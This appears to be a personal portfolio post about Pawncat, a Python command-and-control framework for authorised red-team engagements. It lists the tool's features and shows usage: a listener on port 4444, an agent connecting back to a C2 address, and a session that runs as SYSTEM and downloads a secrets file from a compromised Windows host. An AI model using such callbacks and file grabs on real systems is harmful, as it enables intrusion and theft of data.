← Back

Pawncat

Aug 15, 2024 1 min read

Overview

Pawncat is a lightweight command-and-control (C2) framework built in Python for authorised red team engagements. It features encrypted communications, modular payload generation, and a clean CLI interface for managing multiple sessions.

Disclaimer

This tool is intended for authorised security testing only. Unauthorised use against systems you do not own or have explicit permission to test is illegal and unethical.

Features

AES-256 encrypted communications — all traffic between the server and agents is encrypted
Multi-session management — handle multiple compromised hosts simultaneously
Modular payloads — easily extend with custom payload modules
File transfer — upload and download files between server and agents
Command execution — execute system commands on remote agents
Persistence module — optional persistence mechanisms for long-running engagements
Clean CLI — intuitive command-line interface with tab completion

Usage

Server

1

python3 pawncat.py --listen --port 4444

Agent

1

python3 agent.py --connect 10.10.10.1 --port 4444

Session Management

1
2
3
4
5
6
7
8


pawncat> sessions
  [1] 10.10.10.5 - Windows 10 - Active
  [2] 10.10.10.8 - Ubuntu 22.04 - Active

pawncat> interact 1
[10.10.10.5]> whoami
nt authority\system
[10.10.10.5]> download C:\Users\admin\secrets.txt

Architecture

The framework uses a client-server model with a custom binary protocol over TCP sockets. All payloads are generated from templates and can be customised per engagement.

Learning Outcomes

Building Pawncat taught me about socket programming, encryption implementation, protocol design, and the mindset of thinking like an attacker at the infrastructure level.